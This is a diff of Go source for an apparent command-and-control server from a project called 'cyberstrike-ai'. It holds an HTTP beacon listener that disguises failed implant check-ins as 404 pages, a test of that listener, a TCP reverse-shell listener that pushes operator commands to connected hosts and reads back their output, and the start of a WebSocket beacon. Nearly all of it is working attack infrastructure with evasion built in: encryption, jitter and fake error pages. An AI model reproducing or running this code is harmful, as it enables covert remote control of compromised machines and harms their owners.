if !l.checkImplantToken(r) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
prefix := l.cfg.BeaconFilePath
|
||||
taskID := strings.TrimPrefix(r.URL.Path, prefix)
|
||||
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin")
|
||||
absPath, err := filepath.Abs(fpath)
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
|
||||
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
data, err := os.ReadFile(absPath)
|
||||
if err != nil {
|
||||
l.disguisedReject(w)
|
||||
return
|
||||
}
|
||||
l.writeEncrypted(w, map[string]interface{}{
|
||||
"file_data": base64Encode(data),
|
||||
})
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// 鉴权 / 输出辅助
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
// checkImplantToken 校验 X-Implant-Token header(恒定时间比较防止时序攻击)
|
||||
func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool {
|
||||
got := r.Header.Get("X-Implant-Token")
|
||||
if got == "" {
|
||||
got = r.Header.Get("Cookie") // 兼容 Malleable Profile 用 Cookie 携带
|
||||
}
|
||||
expected := l.rec.ImplantToken
|
||||
if got == "" || expected == "" {
|
||||
return false
|
||||
}
|
||||
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
|
||||
}
|
||||
|
||||
// disguisedReject 鉴权失败时返回 404,避免暴露 listener 是 C2
|
||||
func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) {
|
||||
w.Header().Set("Content-Type", "text/html; charset=utf-8")
|
||||
w.WriteHeader(http.StatusNotFound)
|
||||
_, _ = fmt.Fprint(w, "<html><body><h1>404 Not Found</h1></body></html>")
|
||||
}
|
||||
|
||||
// writeEncrypted JSON 序列化 + AES-GCM 加密 + 写回
|
||||
func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) {
|
||||
body, err := json.Marshal(payload)
|
||||
if err != nil {
|
||||
http.Error(w, "encode failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
http.Error(w, "encrypt failed", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
w.Header().Set("Content-Type", "application/octet-stream")
|
||||
_, _ = w.Write([]byte(enc))
|
||||
}
|
||||
|
||||
// loadProfile loads Malleable Profile from DB if the listener has a profile_id configured
|
||||
func (l *HTTPBeaconListener) loadProfile() {
|
||||
if l.rec.ProfileID == "" {
|
||||
return
|
||||
}
|
||||
profile, err := l.manager.GetProfile(l.rec.ProfileID)
|
||||
if err != nil || profile == nil {
|
||||
l.logger.Warn("加载 Malleable Profile 失败,使用默认配置",
|
||||
zap.String("profile_id", l.rec.ProfileID), zap.Error(err))
|
||||
return
|
||||
}
|
||||
l.profile = profile
|
||||
l.logger.Info("Malleable Profile 已加载",
|
||||
zap.String("profile_id", profile.ID),
|
||||
zap.String("profile_name", profile.Name),
|
||||
zap.String("user_agent", profile.UserAgent))
|
||||
}
|
||||
|
||||
// withProfileHeaders wraps a handler to inject Malleable Profile response headers
|
||||
func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc {
|
||||
return func(w http.ResponseWriter, r *http.Request) {
|
||||
if l.profile != nil && len(l.profile.ResponseHeaders) > 0 {
|
||||
for k, v := range l.profile.ResponseHeaders {
|
||||
w.Header().Set(k, v)
|
||||
}
|
||||
}
|
||||
next(w, r)
|
||||
}
|
||||
}
|
||||
|
||||
// ----------------------------------------------------------------------------
|
||||
// TLS 自签证书(仅供测试 / Phase 2 默认行为)
|
||||
// ----------------------------------------------------------------------------
|
||||
|
||||
func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) {
|
||||
// 操作员显式提供证书 → 优先使用
|
||||
if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" {
|
||||
cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath)
|
||||
if err == nil {
|
||||
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
|
||||
}
|
||||
l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err))
|
||||
}
|
||||
// 自签证书:CN 用 listener 名,避免重复
|
||||
cert, err := generateSelfSignedCert(l.rec.Name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
|
||||
}
|
||||
|
||||
func generateSelfSignedCert(cn string) (tls.Certificate, error) {
|
||||
priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
serial, _ := rand.Int(rand.Reader, big.NewInt(1<<62))
|
||||
tmpl := &x509.Certificate{
|
||||
SerialNumber: serial,
|
||||
Subject: pkix.Name{CommonName: cn},
|
||||
NotBefore: time.Now().Add(-1 * time.Hour),
|
||||
NotAfter: time.Now().Add(365 * 24 * time.Hour),
|
||||
KeyUsage: x509.KeyUsageDigitalSignature,
|
||||
ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
|
||||
IPAddresses: []net.IP{net.ParseIP("127.0.0.1")},
|
||||
DNSNames: []string{"localhost"},
|
||||
}
|
||||
der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &priv.PublicKey, priv)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
keyDER, err := x509.MarshalECPrivateKey(priv)
|
||||
if err != nil {
|
||||
return tls.Certificate{}, err
|
||||
}
|
||||
certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
|
||||
keyPEM := pem.EncodeToMemory(&pem.Block{Type: "EC PRIVATE KEY", Bytes: keyDER})
|
||||
return tls.X509KeyPair(certPEM, keyPEM)
|
||||
}
|
||||
|
||||
func base64Encode(data []byte) string {
|
||||
return base64.StdEncoding.EncodeToString(data)
|
||||
}
|
||||
|
||||
func shortHash(s string) string {
|
||||
h := sha256.Sum256([]byte(s))
|
||||
return hex.EncodeToString(h[:6])
|
||||
}
|
||||
|
||||
// isPlaintextClient 判断请求是否来自明文客户端(curl oneliner 等)
|
||||
// 完整 beacon 二进制会设置 Content-Type: application/octet-stream
|
||||
func (l *HTTPBeaconListener) isPlaintextClient(r *http.Request) bool {
|
||||
ct := r.Header.Get("Content-Type")
|
||||
accept := r.Header.Get("Accept")
|
||||
return strings.Contains(ct, "application/json") ||
|
||||
strings.Contains(accept, "application/json") ||
|
||||
strings.Contains(r.UserAgent(), "curl/")
|
||||
}
|
||||
|
||||
// ApplyJitter 给定基础 sleep + jitter 百分比,返回随机抖动后的 duration
|
||||
// 公开给 listener_websocket / payload 模板共用,避免重复实现
|
||||
func ApplyJitter(baseSec, jitterPercent int) time.Duration {
|
||||
if baseSec <= 0 {
|
||||
return 0
|
||||
}
|
||||
if jitterPercent <= 0 {
|
||||
return time.Duration(baseSec) * time.Second
|
||||
}
|
||||
if jitterPercent > 100 {
|
||||
jitterPercent = 100
|
||||
}
|
||||
delta := mrand.Intn(2*jitterPercent+1) - jitterPercent // [-j, +j]
|
||||
factor := 1.0 + float64(delta)/100.0
|
||||
return time.Duration(float64(baseSec)*factor) * time.Second
|
||||
}
|
||||
@@ -0,0 +1,129 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/json"
|
||||
"io"
|
||||
"net"
|
||||
"net/http"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// 集成验证:路由、鉴权伪装 404、明文 check-in JSON 回包。
|
||||
func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
|
||||
tmp := t.TempDir()
|
||||
dbPath := filepath.Join(tmp, "c2.sqlite")
|
||||
db, err := database.NewDB(dbPath, zap.NewNop())
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = db.Close() })
|
||||
|
||||
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
port := lnPick.Addr().(*net.TCPAddr).Port
|
||||
_ = lnPick.Close()
|
||||
|
||||
keyB64, err := GenerateAESKey()
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
token := "test-implant-token-fixed"
|
||||
|
||||
lid := "l_testhttpbeacon01"
|
||||
rec := &database.C2Listener{
|
||||
ID: lid,
|
||||
Name: "t",
|
||||
Type: string(ListenerTypeHTTPBeacon),
|
||||
BindHost: "127.0.0.1",
|
||||
BindPort: port,
|
||||
EncryptionKey: keyB64,
|
||||
ImplantToken: token,
|
||||
Status: "stopped",
|
||||
ConfigJSON: `{"beacon_check_in_path":"/check_in"}`,
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if err := db.CreateC2Listener(rec); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
m := NewManager(db, zap.NewNop(), filepath.Join(tmp, "c2store"))
|
||||
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
|
||||
if _, err := m.StartListener(lid); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = m.StopListener(lid) })
|
||||
|
||||
base := "http://127.0.0.1:" + strconv.Itoa(port)
|
||||
client := &http.Client{Timeout: 5 * time.Second}
|
||||
|
||||
t.Run("wrong_path_go_default_404", func(t *testing.T) {
|
||||
resp, err := client.Post(base+"/nope", "application/json", strings.NewReader(`{}`))
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusNotFound {
|
||||
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
|
||||
}
|
||||
if !strings.Contains(string(b), "404") || !strings.Contains(strings.ToLower(string(b)), "not found") {
|
||||
t.Fatalf("unexpected body: %q", b)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("check_in_wrong_token_disguised_html_404", func(t *testing.T) {
|
||||
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", bytes.NewBufferString(`{"hostname":"h"}`))
|
||||
req.Header.Set("X-Implant-Token", "wrong-token")
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusNotFound {
|
||||
t.Fatalf("status=%d", resp.StatusCode)
|
||||
}
|
||||
ct := resp.Header.Get("Content-Type")
|
||||
if !strings.Contains(ct, "text/html") {
|
||||
t.Fatalf("content-type=%q body=%q", ct, b)
|
||||
}
|
||||
if !strings.Contains(string(b), "404 Not Found") {
|
||||
t.Fatalf("expected disguised HTML, got: %q", b)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("check_in_ok_plaintext_json", func(t *testing.T) {
|
||||
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
|
||||
req, _ := http.NewRequest(http.MethodPost, base+"/check_in", strings.NewReader(body))
|
||||
req.Header.Set("X-Implant-Token", token)
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
b, _ := io.ReadAll(resp.Body)
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
|
||||
}
|
||||
var out ImplantCheckInResponse
|
||||
if err := json.Unmarshal(b, &out); err != nil {
|
||||
t.Fatalf("json: %v body=%s", err, b)
|
||||
}
|
||||
if out.SessionID == "" || out.NextSleep <= 0 {
|
||||
t.Fatalf("bad response: %+v", out)
|
||||
}
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,439 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"io"
|
||||
"net"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
|
||||
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。
|
||||
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。
|
||||
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session;
|
||||
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
|
||||
type TCPReverseListener struct {
|
||||
rec *database.C2Listener
|
||||
cfg *ListenerConfig
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
|
||||
mu sync.Mutex
|
||||
listener net.Listener
|
||||
stopCh chan struct{}
|
||||
conns map[string]*tcpReverseConn // session_id → 连接
|
||||
stopOnce sync.Once
|
||||
}
|
||||
|
||||
// tcpReverseConn 单个反弹会话的运行时状态
|
||||
type tcpReverseConn struct {
|
||||
sessionID string
|
||||
conn net.Conn
|
||||
reader *bufio.Reader
|
||||
writeMu sync.Mutex // 序列化 write,避免并发 task 写入
|
||||
taskMode int32 // 原子标志: 0=空闲(handleConn读), 1=任务中(runTaskOnConn独占读)
|
||||
}
|
||||
|
||||
// NewTCPReverseListener 工厂方法(注册到 ListenerRegistry["tcp_reverse"])
|
||||
func NewTCPReverseListener(ctx ListenerCreationCtx) (Listener, error) {
|
||||
return &TCPReverseListener{
|
||||
rec: ctx.Listener,
|
||||
cfg: ctx.Config,
|
||||
manager: ctx.Manager,
|
||||
logger: ctx.Logger,
|
||||
stopCh: make(chan struct{}),
|
||||
conns: make(map[string]*tcpReverseConn),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Type 返回类型常量
|
||||
func (l *TCPReverseListener) Type() string { return string(ListenerTypeTCPReverse) }
|
||||
|
||||
// Start 启动 TCP 监听,accept 在独立 goroutine 中运行
|
||||
func (l *TCPReverseListener) Start() error {
|
||||
addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort)
|
||||
ln, err := net.Listen("tcp", addr)
|
||||
if err != nil {
|
||||
if isAddrInUse(err) {
|
||||
return ErrPortInUse
|
||||
}
|
||||
return err
|
||||
}
|
||||
l.mu.Lock()
|
||||
l.listener = ln
|
||||
l.mu.Unlock()
|
||||
go l.acceptLoop()
|
||||
go l.taskDispatcherLoop()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Stop 关闭监听 + 所有活动连接
|
||||
func (l *TCPReverseListener) Stop() error {
|
||||
l.stopOnce.Do(func() {
|
||||
close(l.stopCh)
|
||||
})
|
||||
l.mu.Lock()
|
||||
if l.listener != nil {
|
||||
_ = l.listener.Close()
|
||||
l.listener = nil
|
||||
}
|
||||
for sid, c := range l.conns {
|
||||
_ = c.conn.Close()
|
||||
delete(l.conns, sid)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (l *TCPReverseListener) acceptLoop() {
|
||||
for {
|
||||
l.mu.Lock()
|
||||
ln := l.listener
|
||||
l.mu.Unlock()
|
||||
if ln == nil {
|
||||
return
|
||||
}
|
||||
conn, err := ln.Accept()
|
||||
if err != nil {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
default:
|
||||
}
|
||||
if isClosedConnErr(err) {
|
||||
return
|
||||
}
|
||||
l.logger.Warn("tcp_reverse accept 失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
go l.handleConn(conn)
|
||||
}
|
||||
}
|
||||
|
||||
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。
|
||||
func (l *TCPReverseListener) handleConn(conn net.Conn) {
|
||||
br := bufio.NewReader(conn)
|
||||
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second))
|
||||
prefix, err := br.Peek(4)
|
||||
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
|
||||
if _, err := br.Discard(4); err != nil {
|
||||
_ = conn.Close()
|
||||
return
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
l.handleTCPBeaconSession(conn, br)
|
||||
return
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
l.handleShellConn(conn, br)
|
||||
}
|
||||
|
||||
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。
|
||||
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
|
||||
remote := conn.RemoteAddr().String()
|
||||
host, _, _ := net.SplitHostPort(remote)
|
||||
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
|
||||
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
|
||||
hash := sha256.Sum256([]byte(uuidSeed))
|
||||
implantUUID := hex.EncodeToString(hash[:8])
|
||||
|
||||
checkin := ImplantCheckInRequest{
|
||||
ImplantUUID: implantUUID,
|
||||
Hostname: "tcp_" + host,
|
||||
Username: "unknown",
|
||||
OS: "unknown",
|
||||
Arch: "unknown",
|
||||
InternalIP: host,
|
||||
SleepSeconds: 0, // 交互式不需要 sleep
|
||||
JitterPercent: 0,
|
||||
Metadata: map[string]interface{}{
|
||||
"transport": "tcp_reverse",
|
||||
"remote": remote,
|
||||
},
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, checkin)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp_reverse 登记会话失败", zap.Error(err))
|
||||
_ = conn.Close()
|
||||
return
|
||||
}
|
||||
|
||||
tc := &tcpReverseConn{
|
||||
sessionID: session.ID,
|
||||
conn: conn,
|
||||
reader: br,
|
||||
}
|
||||
l.mu.Lock()
|
||||
if old, exists := l.conns[session.ID]; exists {
|
||||
_ = old.conn.Close()
|
||||
}
|
||||
l.conns[session.ID] = tc
|
||||
l.mu.Unlock()
|
||||
|
||||
defer func() {
|
||||
l.mu.Lock()
|
||||
if cur, ok := l.conns[session.ID]; ok && cur == tc {
|
||||
delete(l.conns, session.ID)
|
||||
_ = l.manager.MarkSessionDead(session.ID)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
_ = conn.Close()
|
||||
}()
|
||||
|
||||
// 主循环:检测连接存活 + 读取非任务期间的 unsolicited 输出
|
||||
// 注意:必须统一使用 tc.reader 读取,避免与 runTaskOnConn 的 bufio.Reader 产生数据分裂
|
||||
buf := make([]byte, 4096)
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
default:
|
||||
}
|
||||
// 任务执行中,runTaskOnConn 独占读取权,主循环暂停
|
||||
if atomic.LoadInt32(&tc.taskMode) == 1 {
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
continue
|
||||
}
|
||||
_ = conn.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
n, err := tc.reader.Read(buf)
|
||||
if n > 0 {
|
||||
// 收到数据也刷新心跳
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
if atomic.LoadInt32(&tc.taskMode) == 0 {
|
||||
l.manager.publishEvent("info", "task", session.ID, "",
|
||||
"stdout(unsolicited)", map[string]interface{}{
|
||||
"output": string(buf[:n]),
|
||||
})
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
if err == io.EOF || isClosedConnErr(err) {
|
||||
return
|
||||
}
|
||||
if ne, ok := err.(net.Error); ok && ne.Timeout() {
|
||||
// 读超时 = 连接仍存活但无数据,刷新心跳防止看门狗误判
|
||||
_ = l.manager.DB().TouchC2Session(session.ID, string(SessionActive), time.Now())
|
||||
continue
|
||||
}
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// taskDispatcherLoop 周期扫描所有活动会话的任务队列,下发 exec/shell 类型的同步命令
|
||||
func (l *TCPReverseListener) taskDispatcherLoop() {
|
||||
t := time.NewTicker(500 * time.Millisecond)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
l.mu.Lock()
|
||||
snapshot := make([]*tcpReverseConn, 0, len(l.conns))
|
||||
for _, c := range l.conns {
|
||||
snapshot = append(snapshot, c)
|
||||
}
|
||||
l.mu.Unlock()
|
||||
for _, c := range snapshot {
|
||||
envelopes, err := l.manager.PopTasksForBeacon(c.sessionID, 5)
|
||||
if err != nil || len(envelopes) == 0 {
|
||||
continue
|
||||
}
|
||||
for _, env := range envelopes {
|
||||
go l.runTaskOnConn(c, env)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// runTaskOnConn 把一条 task 转成 raw shell 命令发送,通过结束标记读输出
|
||||
func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope) {
|
||||
startedAt := NowUnixMillis()
|
||||
cmd, ok := buildTCPCommand(TaskType(env.TaskType), env.Payload)
|
||||
if !ok {
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, "", "tcp_reverse listener 不支持该任务类型: "+env.TaskType, "", "")
|
||||
return
|
||||
}
|
||||
|
||||
// 独占读取权:通知 handleConn 主循环暂停
|
||||
atomic.StoreInt32(&c.taskMode, 1)
|
||||
defer atomic.StoreInt32(&c.taskMode, 0)
|
||||
|
||||
// 等待 handleConn 循环退出读取(给 100ms 让正在进行的 Read 超时/完成)
|
||||
time.Sleep(150 * time.Millisecond)
|
||||
|
||||
// 排空 buffer 中残留的 bash 提示符等数据
|
||||
drainStaleData(c.reader, c.conn)
|
||||
|
||||
endMark := fmt.Sprintf("__C2_DONE_%s__", env.TaskID)
|
||||
wrapped := fmt.Sprintf("%s\necho %s\n", strings.TrimSpace(cmd), endMark)
|
||||
c.writeMu.Lock()
|
||||
_ = c.conn.SetWriteDeadline(time.Now().Add(15 * time.Second))
|
||||
if _, err := c.conn.Write([]byte(wrapped)); err != nil {
|
||||
c.writeMu.Unlock()
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, "", "写命令失败: "+err.Error(), "", "")
|
||||
return
|
||||
}
|
||||
c.writeMu.Unlock()
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||
defer cancel()
|
||||
output, err := readUntilMarker(ctx, c.reader, endMark)
|
||||
if err != nil {
|
||||
l.reportTaskResult(env.TaskID, startedAt, false, output, "读取结果失败: "+err.Error(), "", "")
|
||||
return
|
||||
}
|
||||
cleaned := cleanShellOutput(output, cmd)
|
||||
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
|
||||
}
|
||||
|
||||
// reportTaskResult 适配 Manager.IngestTaskResult,统一报告路径
|
||||
func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64, success bool, output, errMsg, blobB64, blobSuffix string) {
|
||||
_ = l.manager.IngestTaskResult(TaskResultReport{
|
||||
TaskID: taskID,
|
||||
Success: success,
|
||||
Output: output,
|
||||
Error: errMsg,
|
||||
BlobBase64: blobB64,
|
||||
BlobSuffix: blobSuffix,
|
||||
StartedAt: startedAtMS,
|
||||
EndedAt: NowUnixMillis(),
|
||||
})
|
||||
}
|
||||
|
||||
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
|
||||
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些
|
||||
// 需要二进制传输的能力建议使用 http_beacon。
|
||||
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
|
||||
switch t {
|
||||
case TaskTypeExec, TaskTypeShell:
|
||||
cmd, _ := payload["command"].(string)
|
||||
return cmd, true
|
||||
case TaskTypePwd:
|
||||
return "pwd 2>/dev/null || cd", true
|
||||
case TaskTypeLs:
|
||||
path, _ := payload["path"].(string)
|
||||
if strings.TrimSpace(path) == "" {
|
||||
path = "."
|
||||
}
|
||||
return "ls -la " + shellQuote(path), true
|
||||
case TaskTypePs:
|
||||
return "ps -ef 2>/dev/null || ps aux", true
|
||||
case TaskTypeKillProc:
|
||||
pid, _ := payload["pid"].(float64)
|
||||
if pid <= 0 {
|
||||
return "", false
|
||||
}
|
||||
return fmt.Sprintf("kill -9 %d", int(pid)), true
|
||||
case TaskTypeCd:
|
||||
path, _ := payload["path"].(string)
|
||||
if strings.TrimSpace(path) == "" {
|
||||
return "", false
|
||||
}
|
||||
return "cd " + shellQuote(path) + " && pwd", true
|
||||
case TaskTypeExit:
|
||||
return "exit 0", true
|
||||
}
|
||||
return "", false
|
||||
}
|
||||
|
||||
// readUntilMarker 从 reader 持续读,直到匹配 endMarker;返回去掉标记后的输出
|
||||
func readUntilMarker(ctx context.Context, r *bufio.Reader, marker string) (string, error) {
|
||||
var sb strings.Builder
|
||||
buf := make([]byte, 4096)
|
||||
deadline := time.Now().Add(60 * time.Second)
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return sb.String(), ctx.Err()
|
||||
default:
|
||||
}
|
||||
if time.Now().After(deadline) {
|
||||
return sb.String(), fmt.Errorf("timeout")
|
||||
}
|
||||
n, err := r.Read(buf)
|
||||
if n > 0 {
|
||||
sb.Write(buf[:n])
|
||||
if idx := strings.Index(sb.String(), marker); idx >= 0 {
|
||||
return strings.TrimRight(sb.String()[:idx], "\r\n"), nil
|
||||
}
|
||||
}
|
||||
if err != nil {
|
||||
return sb.String(), err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func shellQuote(s string) string {
|
||||
return "'" + strings.ReplaceAll(s, "'", "'\\''") + "'"
|
||||
}
|
||||
|
||||
func isAddrInUse(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
}
|
||||
return strings.Contains(strings.ToLower(err.Error()), "address already in use") ||
|
||||
strings.Contains(strings.ToLower(err.Error()), "bind: only one usage")
|
||||
}
|
||||
|
||||
func isClosedConnErr(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
}
|
||||
es := err.Error()
|
||||
return strings.Contains(es, "use of closed network connection") ||
|
||||
strings.Contains(es, "connection reset by peer")
|
||||
}
|
||||
|
||||
// drainStaleData 用短超时读取并丢弃 buffer 中残留的 shell 提示符等数据
|
||||
func drainStaleData(r *bufio.Reader, conn net.Conn) {
|
||||
buf := make([]byte, 4096)
|
||||
for {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(200 * time.Millisecond))
|
||||
n, err := r.Read(buf)
|
||||
if n == 0 || err != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
// 恢复较长的读超时
|
||||
_ = conn.SetReadDeadline(time.Time{})
|
||||
}
|
||||
|
||||
var shellPromptRe = regexp.MustCompile(`(?m)^.*?(bash[\-\d.]*\$|[\$#%>]\s*)$`)
|
||||
|
||||
// cleanShellOutput 过滤 bash 提示符行和命令回显,返回干净的命令输出
|
||||
func cleanShellOutput(raw, cmd string) string {
|
||||
lines := strings.Split(raw, "\n")
|
||||
var cleaned []string
|
||||
cmdTrimmed := strings.TrimSpace(cmd)
|
||||
echoSkipped := false
|
||||
for _, line := range lines {
|
||||
trimmed := strings.TrimRight(line, "\r \t")
|
||||
// 跳过命令回显行(bash 会 echo 回输入的命令)
|
||||
if !echoSkipped && cmdTrimmed != "" && strings.Contains(trimmed, cmdTrimmed) {
|
||||
echoSkipped = true
|
||||
continue
|
||||
}
|
||||
// 跳过纯 shell 提示符行
|
||||
if shellPromptRe.MatchString(trimmed) && len(strings.TrimSpace(shellPromptRe.ReplaceAllString(trimmed, ""))) == 0 {
|
||||
continue
|
||||
}
|
||||
cleaned = append(cleaned, line)
|
||||
}
|
||||
result := strings.Join(cleaned, "\n")
|
||||
return strings.TrimSpace(result)
|
||||
}
|
||||
@@ -0,0 +1,297 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/subtle"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gorilla/websocket"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// WebSocketListener 提供低延迟的双向 WebSocket Beacon。
|
||||
// 与 HTTP Beacon 相比:
|
||||
// - beacon 与服务端保持长连接,无需轮询,新任务可"秒到";
|
||||
// - 适合需要交互式快速响应的场景(如实时键盘 / 流式输出);
|
||||
// - 协议依然走 AES-256-GCM,握手时校验 X-Implant-Token;
|
||||
// - 一个 listener 仅处理一个 WS 路径(默认 /ws),但可承载多个并发 implant。
|
||||
//
|
||||
// 帧协议(皆为加密后 base64 字符串走 TextMessage):
|
||||
